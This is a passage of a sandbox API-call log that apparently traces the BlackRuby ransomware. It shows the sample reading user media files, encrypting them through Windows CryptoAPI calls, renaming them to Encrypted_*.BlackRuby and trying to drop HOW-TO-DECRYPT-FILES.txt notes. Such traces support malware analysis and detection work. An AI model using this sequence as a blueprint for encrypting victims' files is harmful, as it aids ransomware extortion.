lpNewFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_NCFmMiYeZnHLsXLI3iZd6cxOXB9OP7vh0VdDm2o.BlackRuby" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\encrypted_ncfmmiyeznhlsxli3izd6cxoxb9op7vh0vddm2o.blackruby")) returned 1 [0051.714] GetLastError () returned 0xb7 [0051.714] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x39 [0051.714] GetLastError () returned 0xb7 [0051.714] SetErrorMode (uMode=0x1) returned 0x0 [0051.714] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0051.714] GetLastError () returned 0x5 [0051.715] SetErrorMode (uMode=0x0) returned 0x1 [0051.715] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\WV1nS2y4VY0h1D.gif", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\WV1nS2y4VY0h1D.gif", lpFilePart=0x0) returned 0x33 [0051.715] GetLastError () returned 0x5 [0051.715] SetErrorMode (uMode=0x1) returned 0x0 [0051.715] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\WV1nS2y4VY0h1D.gif" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\wv1ns2y4vy0h1d.gif"), fInfoLevelId=0x0, lpFileInformation=0x1c541b4 | out: lpFileInformation=0x1c541b4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x29c230e0, ftCreationTime.dwHighDateTime=0x1d353fd, ftLastAccessTime.dwLowDateTime=0xd37828e0, ftLastAccessTime.dwHighDateTime=0x1d34eb9, ftLastWriteTime.dwLowDateTime=0xd37828e0, ftLastWriteTime.dwHighDateTime=0x1d34eb9, nFileSizeHigh=0x0, nFileSizeLow=0x4df3)) returned 1 [0051.715] GetLastError () returned 0x5 [0051.715] SetErrorMode (uMode=0x0) returned 0x1 [0051.715] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\WV1nS2y4VY0h1D.gif", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\WV1nS2y4VY0h1D.gif", lpFilePart=0x0) returned 0x33 [0051.715] GetLastError () returned 0x5 [0051.715] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\WV1nS2y4VY0h1D.gif", nBufferLength=0x105, lpBuffer=0x18e7bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\WV1nS2y4VY0h1D.gif", lpFilePart=0x0) returned 0x33 [0051.715] GetLastError () returned 0x5 [0051.715] SetErrorMode (uMode=0x1) returned 0x0 [0051.715] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\WV1nS2y4VY0h1D.gif" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\wv1ns2y4vy0h1d.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0051.715] GetLastError () returned 0x0 [0051.715] GetFileType (hFile=0x184) returned 0x1 [0051.715] SetErrorMode (uMode=0x0) returned 0x1 [0051.715] GetFileType (hFile=0x184) returned 0x1 [0051.715] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ed70 | out: lpFileSizeHigh=0x18ed70*=0x0) returned 0x4df3 [0051.716] GetLastError () returned 0x0 [0051.716] ReadFile (in: hFile=0x184, lpBuffer=0x1c560dc, nNumberOfBytesToRead=0x4df3, lpNumberOfBytesRead=0x18ed18, lpOverlapped=0x0 | out: lpBuffer=0x1c560dc*, lpNumberOfBytesRead=0x18ed18*=0x4df3, lpOverlapped=0x0) returned 1 [0051.718] GetLastError () returned 0x0 [0051.718] CloseHandle (hObject=0x184) returned 1 [0051.718] GetLastError () returned 0x0 [0051.718] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\WV1nS2y4VY0h1D.gif", nBufferLength=0x105, lpBuffer=0x18e8cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\WV1nS2y4VY0h1D.gif", lpFilePart=0x0) returned 0x33 [0051.718] GetLastError () returned 0x0 [0051.718] SetErrorMode (uMode=0x1) returned 0x0 [0051.718] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\WV1nS2y4VY0h1D.gif" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\wv1ns2y4vy0h1d.gif"), fInfoLevelId=0x0, lpFileInformation=0x18ed80 | out: lpFileInformation=0x18ed80*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x29c230e0, ftCreationTime.dwHighDateTime=0x1d353fd, ftLastAccessTime.dwLowDateTime=0xd37828e0, ftLastAccessTime.dwHighDateTime=0x1d34eb9, ftLastWriteTime.dwLowDateTime=0xd37828e0, ftLastWriteTime.dwHighDateTime=0x1d34eb9, nFileSizeHigh=0x0, nFileSizeLow=0x4df3)) returned 1 [0051.718] GetLastError () returned 0x0 [0051.718] SetErrorMode (uMode=0x0) returned 0x1 [0051.728] CryptImportKey (in: hProv=0x37c818, pbData=0x1cba088, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ecbc | out: phKey=0x18ecbc*=0x360aa0) returned 1 [0051.728] GetLastError () returned 0x0 [0051.728] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0051.728] GetLastError () returned 0x0 [0051.733] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0051.733] GetLastError () returned 0x0 [0051.733] CryptDuplicateKey (in: hKey=0x360aa0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec78 | out: phKey=0x18ec78*=0x3609e0) returned 1 [0051.733] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0051.733] GetLastError () returned 0x0 [0051.733] CryptSetKeyParam (hKey=0x3609e0, dwParam=0x4, pbData=0x1ce70d4*=0x1, dwFlags=0x0) returned 1 [0051.733] GetLastError () returned 0x0 [0051.733] CryptSetKeyParam (hKey=0x3609e0, dwParam=0x1, pbData=0x1ce70a0, dwFlags=0x0) returned 1 [0051.733] GetLastError () returned 0x0 [0051.733] CryptEncrypt (in: hKey=0x3609e0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1ce711c*, pdwDataLen=0x18ed08*=0x4ef0, dwBufLen=0x4ef0 | out: pbData=0x1ce711c*, pdwDataLen=0x18ed08*=0x4ef0) returned 1 [0051.734] GetLastError () returned 0x0 [0051.734] CryptEncrypt (in: hKey=0x3609e0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1cf0f28*, pdwDataLen=0x18ed20*=0x10, dwBufLen=0x10 | out: pbData=0x1cf0f28*, pdwDataLen=0x18ed20*=0x10) returned 1 [0051.734] GetLastError () returned 0x0 [0051.734] CryptEncrypt (in: hKey=0x3609e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1cf0f58*, pdwDataLen=0x18ed28*=0x0, dwBufLen=0x10 | out: pbData=0x1cf0f58*, pdwDataLen=0x18ed28*=0x10) returned 1 [0051.734] GetLastError () returned 0x0 [0051.734] CryptDestroyKey (hKey=0x360aa0) returned 1 [0051.734] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0051.734] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0051.734] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\WV1nS2y4VY0h1D.gif", nBufferLength=0x105, lpBuffer=0x18e7c4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\WV1nS2y4VY0h1D.gif", lpFilePart=0x0) returned 0x33 [0051.734] GetLastError () returned 0x0 [0051.734] SetErrorMode (uMode=0x1) returned 0x0 [0051.736] GetFileType (hFile=0x184) returned 0x1 [0051.736] SetErrorMode (uMode=0x0) returned 0x1 [0051.736] GetFileType (hFile=0x184) returned 0x1 [0051.736] WriteFile (in: hFile=0x184, lpBuffer=0x1cfad74*, nNumberOfBytesToWrite=0x4f00, lpNumberOfBytesWritten=0x18ed24, lpOverlapped=0x0 | out: lpBuffer=0x1cfad74*, lpNumberOfBytesWritten=0x18ed24*=0x4f00, lpOverlapped=0x0) returned 1 [0051.738] GetLastError () returned 0xb7 [0051.738] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\WV1nS2y4VY0h1D.gif" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\wv1ns2y4vy0h1d.gif"), lpNewFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_A4HzRl9SuPyeKRh4BzlscZM1lbFMGSJbKuf0o5VqBrhbJ.BlackRuby" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\encrypted_a4hzrl9supyekrh4bzlsczm1lbfmgsjbkuf0o5vqbrhbj.blackruby")) returned 1 [0051.739] GetLastError () returned 0xb7 [0051.740] SetErrorMode (uMode=0x0) returned 0x1 [0051.740] GetFileType (hFile=0x184) returned 0x1 [0051.740] SetErrorMode (uMode=0x0) returned 0x1 [0051.740] GetFileType (hFile=0x184) returned 0x1 [0051.740] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ed70 | out: lpFileSizeHigh=0x18ed70*=0x0) returned 0x7881 [0051.740] GetLastError () returned 0x0 [0051.740] ReadFile (in: hFile=0x184, lpBuffer=0x1d1e9a0, nNumberOfBytesToRead=0x7881, lpNumberOfBytesRead=0x18ed18, lpOverlapped=0x0 | out: lpBuffer=0x1d1e9a0*, lpNumberOfBytesRead=0x18ed18*=0x7881, lpOverlapped=0x0) returned 1 [0051.741] GetLastError () returned 0x0 [0051.779] CryptImportKey (in: hProv=0x37c708, pbData=0x1b85dbc, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ecbc | out: phKey=0x18ecbc*=0x360ae0) returned 1 [0051.779] GetLastError () returned 0x0 [0051.779] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0051.779] GetLastError () returned 0x0 [0051.784] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0051.784] GetLastError () returned 0x0 [0051.784] CryptDuplicateKey (in: hKey=0x360ae0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec78 | out: phKey=0x18ec78*=0x360da0) returned 1 [0051.784] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0051.784] GetLastError () returned 0x0 [0051.784] CryptSetKeyParam (hKey=0x360da0, dwParam=0x4, pbData=0x1bb2e08*=0x1, dwFlags=0x0) returned 1 [0051.784] GetLastError () returned 0x0 [0051.784] CryptSetKeyParam (hKey=0x360da0, dwParam=0x1, pbData=0x1bb2dd4, dwFlags=0x0) returned 1 [0051.784] GetLastError () returned 0x0 [0051.784] CryptEncrypt (in: hKey=0x360da0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1bb2e50*, pdwDataLen=0x18ed08*=0x7980, dwBufLen=0x7980 | out: pbData=0x1bb2e50*, pdwDataLen=0x18ed08*=0x7980) returned 1 [0051.784] GetLastError () returned 0x0 [0051.784] CryptEncrypt (in: hKey=0x360da0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1bc217c*, pdwDataLen=0x18ed20*=0x10, dwBufLen=0x10 | out: pbData=0x1bc217c*, pdwDataLen=0x18ed20*=0x10) returned 1 [0051.784] GetLastError () returned 0x0 [0051.784] CryptEncrypt (in: hKey=0x360da0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1bc21ac*, pdwDataLen=0x18ed28*=0x0, dwBufLen=0x10 | out: pbData=0x1bc21ac*, pdwDataLen=0x18ed28*=0x10) returned 1 [0051.784] GetLastError () returned 0x0 [0051.784] CryptDestroyKey (hKey=0x360ae0) returned 1 [0051.784] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0051.784] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0051.784] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\xeLW1.mp4", nBufferLength=0x105, lpBuffer=0x18e7c4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\xeLW1.mp4", lpFilePart=0x0) returned 0x2a [0051.784] GetLastError () returned 0x0 [0051.785] SetErrorMode (uMode=0x1) returned 0x0 [0051.785] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\xeLW1.mp4" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\xelw1.mp4"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0051.785] GetLastError () returned 0xb7 [0051.785] GetFileType (hFile=0x184) returned 0x1 [0051.786] SetErrorMode (uMode=0x0) returned 0x1 [0051.786] GetFileType (hFile=0x184) returned 0x1 [0051.787] CloseHandle (hObject=0x184) returned 1 [0051.787] GetLastError () returned 0xb7 [0051.787] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\xeLW1.mp4", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\xeLW1.mp4", lpFilePart=0x0) returned 0x2a [0051.787] GetLastError () returned 0xb7 [0051.787] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_GitzWegIKFBxS946Opl1DoC3hFSvEtT57j2p.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_GitzWegIKFBxS946Opl1DoC3hFSvEtT57j2p.BlackRuby", lpFilePart=0x0) returned 0x59 [0051.787] GetLastError () returned 0xb7 [0051.787] SetErrorMode (uMode=0x1) returned 0x0 [0051.787] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\xeLW1.mp4" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\xelw1.mp4"), fInfoLevelId=0x0, lpFileInformation=0x18ed68 | out: lpFileInformation=0x18ed68*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x40fde930, ftCreationTime.dwHighDateTime=0x1d3500f, ftLastAccessTime.dwLowDateTime=0xa2120930, ftLastAccessTime.dwHighDateTime=0x1d35597, ftLastWriteTime.dwLowDateTime=0x27120660, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x7990)) returned 1 [0051.787] GetLastError () returned 0xb7 [0051.787] SetErrorMode (uMode=0x0) returned 0x1 [0051.787] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\xeLW1.mp4" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\xelw1.mp4"), lpNewFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_GitzWegIKFBxS946Opl1DoC3hFSvEtT57j2p.BlackRuby" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\encrypted_gitzwegikfbxs946opl1doc3hfsvett57j2p.blackruby")) returned 1 [0051.787] GetLastError () returned 0xb7 [0051.788] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x39 [0051.788] GetLastError () returned 0xb7 [0051.788] SetErrorMode (uMode=0x1) returned 0x0 [0051.788] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0051.788] GetLastError () returned 0x5 [0051.789] SetErrorMode (uMode=0x0) returned 0x1 [0051.789] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\_lbq25vR1.bmp", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\_lbq25vR1.bmp", lpFilePart=0x0) returned 0x2e [0051.789] GetLastError () returned 0x5 [0051.789] SetErrorMode (uMode=0x1) returned 0x0 [0051.789] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\_lbq25vR1.bmp" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\_lbq25vr1.bmp"), fInfoLevelId=0x0, lpFileInformation=0x1bf60e0 | out: lpFileInformation=0x1bf60e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x99e9fe80, ftCreationTime.dwHighDateTime=0x1d3565e, ftLastAccessTime.dwLowDateTime=0x2b92cf60, ftLastAccessTime.dwHighDateTime=0x1d351d2, ftLastWriteTime.dwLowDateTime=0x2b92cf60, ftLastWriteTime.dwHighDateTime=0x1d351d2, nFileSizeHigh=0x0, nFileSizeLow=0x48c7)) returned 1 [0051.789] GetLastError () returned 0x5 [0051.789] SetErrorMode (uMode=0x0) returned 0x1 [0051.789] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\_lbq25vR1.bmp", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\_lbq25vR1.bmp", lpFilePart=0x0) returned 0x2e [0051.789] GetLastError () returned 0x5 [0051.789] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\_lbq25vR1.bmp", nBufferLength=0x105, lpBuffer=0x18e7bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\_lbq25vR1.bmp", lpFilePart=0x0) returned 0x2e [0051.789] GetLastError () returned 0x5 [0051.789] SetErrorMode (uMode=0x1) returned 0x0 [0051.789] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\_lbq25vR1.bmp" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\_lbq25vr1.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0051.789] GetLastError () returned 0x0 [0051.790] GetFileType (hFile=0x184) returned 0x1 [0051.790] SetErrorMode (uMode=0x0) returned 0x1 [0051.790] GetFileType (hFile=0x184) returned 0x1 [0051.790] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ed70 | out: lpFileSizeHigh=0x18ed70*=0x0) returned 0x48c7 [0051.790] GetLastError () returned 0x0 [0051.790] ReadFile (in: hFile=0x184, lpBuffer=0x1bf7fe4, nNumberOfBytesToRead=0x48c7, lpNumberOfBytesRead=0x18ed18, lpOverlapped=0x0 | out: lpBuffer=0x1bf7fe4*, lpNumberOfBytesRead=0x18ed18*=0x48c7, lpOverlapped=0x0) returned 1 [0051.790] GetLastError () returned 0x0 [0051.790] CloseHandle (hObject=0x184) returned 1 [0051.791] GetLastError () returned 0x0 [0051.791] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\_lbq25vR1.bmp", nBufferLength=0x105, lpBuffer=0x18e8cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\_lbq25vR1.bmp", lpFilePart=0x0) returned 0x2e [0051.791] GetLastError () returned 0x0 [0051.791] SetErrorMode (uMode=0x1) returned 0x0 [0051.791] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\_lbq25vR1.bmp" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\_lbq25vr1.bmp"), fInfoLevelId=0x0, lpFileInformation=0x18ed80 | out: lpFileInformation=0x18ed80*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x99e9fe80, ftCreationTime.dwHighDateTime=0x1d3565e, ftLastAccessTime.dwLowDateTime=0x2b92cf60, ftLastAccessTime.dwHighDateTime=0x1d351d2, ftLastWriteTime.dwLowDateTime=0x2b92cf60, ftLastWriteTime.dwHighDateTime=0x1d351d2, nFileSizeHigh=0x0, nFileSizeLow=0x48c7)) returned 1 [0051.791] GetLastError () returned 0x0 [0051.791] SetErrorMode (uMode=0x0) returned 0x1 [0051.801] CryptImportKey (in: hProv=0x37c4e8, pbData=0x1c5b524, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ecbc | out: phKey=0x18ecbc*=0x3609e0) returned 1 [0051.801] GetLastError () returned 0x0 [0051.801] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0051.801] GetLastError () returned 0x0 [0051.806] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0051.806] GetLastError () returned 0x0 [0051.806] CryptDuplicateKey (in: hKey=0x3609e0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec78 | out: phKey=0x18ec78*=0x360b60) returned 1 [0051.806] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0051.806] GetLastError () returned 0x0 [0051.806] CryptSetKeyParam (hKey=0x360b60, dwParam=0x4, pbData=0x1c88570*=0x1, dwFlags=0x0) returned 1 [0051.806] GetLastError () returned 0x0 [0051.806] CryptSetKeyParam (hKey=0x360b60, dwParam=0x1, pbData=0x1c8853c, dwFlags=0x0) returned 1 [0051.806] GetLastError () returned 0x0 [0051.806] CryptEncrypt (in: hKey=0x360b60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c885b8*, pdwDataLen=0x18ed08*=0x49c0, dwBufLen=0x49c0 | out: pbData=0x1c885b8*, pdwDataLen=0x18ed08*=0x49c0) returned 1 [0051.806] GetLastError () returned 0x0 [0051.806] CryptEncrypt (in: hKey=0x360b60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c91964*, pdwDataLen=0x18ed20*=0x10, dwBufLen=0x10 | out: pbData=0x1c91964*, pdwDataLen=0x18ed20*=0x10) returned 1 [0051.806] GetLastError () returned 0x0 [0051.807] CryptEncrypt (in: hKey=0x360b60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c91994*, pdwDataLen=0x18ed28*=0x0, dwBufLen=0x10 | out: pbData=0x1c91994*, pdwDataLen=0x18ed28*=0x10) returned 1 [0051.807] GetLastError () returned 0x0 [0051.807] CryptDestroyKey (hKey=0x3609e0) returned 1 [0051.807] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0051.807] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0051.807] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\_lbq25vR1.bmp", nBufferLength=0x105, lpBuffer=0x18e7c4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\_lbq25vR1.bmp", lpFilePart=0x0) returned 0x2e [0051.807] GetLastError () returned 0x0 [0051.807] SetErrorMode (uMode=0x1) returned 0x0 [0051.808] GetFileType (hFile=0x184) returned 0x1 [0051.808] SetErrorMode (uMode=0x0) returned 0x1 [0051.808] GetFileType (hFile=0x184) returned 0x1 [0051.808] WriteFile (in: hFile=0x184, lpBuffer=0x1c9ad50*, nNumberOfBytesToWrite=0x49d0, lpNumberOfBytesWritten=0x18ed24, lpOverlapped=0x0 | out: lpBuffer=0x1c9ad50*, lpNumberOfBytesWritten=0x18ed24*=0x49d0, lpOverlapped=0x0) returned 1 [0051.809] GetLastError () returned 0xb7 [0051.809] CloseHandle (hObject=0x184) returned 1 [0051.809] GetLastError () returned 0xb7 [0051.809] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\_lbq25vR1.bmp", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\_lbq25vR1.bmp", lpFilePart=0x0) returned 0x2e [0051.809] GetLastError () returned 0xb7 [0051.809] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_4ZvDbiG7fssGu3PqX7yFkkcevfau5FrxH04lyRniqU.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_4ZvDbiG7fssGu3PqX7yFkkcevfau5FrxH04lyRniqU.BlackRuby", lpFilePart=0x0) returned 0x5f [0051.809] GetLastError () returned 0xb7 [0051.809] SetErrorMode (uMode=0x1) returned 0x0 [0051.809] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\_lbq25vR1.bmp" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\_lbq25vr1.bmp"), fInfoLevelId=0x0, lpFileInformation=0x18ed68 | out: lpFileInformation=0x18ed68*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x99e9fe80, ftCreationTime.dwHighDateTime=0x1d3565e, ftLastAccessTime.dwLowDateTime=0x2b92cf60, ftLastAccessTime.dwHighDateTime=0x1d351d2, ftLastWriteTime.dwLowDateTime=0x271467c0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x49d0)) returned 1 [0051.809] GetLastError () returned 0xb7 [0051.809] SetErrorMode (uMode=0x0) returned 0x1 [0051.809] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\_lbq25vR1.bmp" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\_lbq25vr1.bmp"), lpNewFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_4ZvDbiG7fssGu3PqX7yFkkcevfau5FrxH04lyRniqU.BlackRuby" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\encrypted_4zvdbig7fssgu3pqx7yfkkcevfau5frxh04lyrniqu.blackruby")) returned 1 [0051.810] GetLastError () returned 0xb7 [0051.811] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x39 [0051.811] GetLastError () returned 0xb7 [0051.811] SetErrorMode (uMode=0x1) returned 0x0 [0051.811] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0051.811] GetLastError () returned 0x5 [0051.812] SetErrorMode (uMode=0x0) returned 0x1 [0051.813] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe", nBufferLength=0x105, lpBuffer=0x18e928, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe", lpFilePart=0x0) returned 0x26 [0051.813] GetLastError () returned 0x5 [0051.813] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0051.813] GetLastError () returned 0x5 [0051.813] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e84c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0051.813] GetLastError () returned 0x5 [0051.813] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe", nBufferLength=0x105, lpBuffer=0x18e800, lpFilePart=0x0 | out: 